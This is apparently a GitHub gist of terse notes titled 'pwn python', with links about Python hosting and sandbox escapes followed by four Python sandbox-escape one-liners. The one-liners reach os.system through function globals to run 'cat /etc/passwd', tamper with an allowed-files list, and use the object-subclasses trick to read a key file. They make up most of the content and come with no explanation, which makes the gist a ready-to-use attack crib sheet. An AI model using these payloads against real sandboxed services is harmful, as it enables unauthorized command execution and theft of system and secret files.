Skip to content

Instantly share code, notes, and snippets.

@hellok
Created March 6, 2013 08:24
Show Gist options
  • Save hellok/5097616 to your computer and use it in GitHub Desktop.
Save hellok/5097616 to your computer and use it in GitHub Desktop.
pwn python
pwnpython.sinaapp.com
http://www.doc88.com/p-776872822117.html
https://github.com/ichuan/djblog django on sae
https://github.com/SAEPython/saepythondevguide
https://gist.github.com/nkchenz/1400023 good!
OLD:
isisblogs.poly.edu/2012/10/26/escaping-python-sandboxes/
Reader.func_globals['sys'].modules['os'].system("cat /etc/passwd")
Reader.func_closure[0].cell_contents.func_globals['ALLOWED_FILES'].append('/etc/passwd')
Reader.func_closure[0].cell_contents.func_closure[0].cell_contents('/etc/passwd').read()
().__class__.__bases__[0].__subclasses__()[40]("./key").read()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment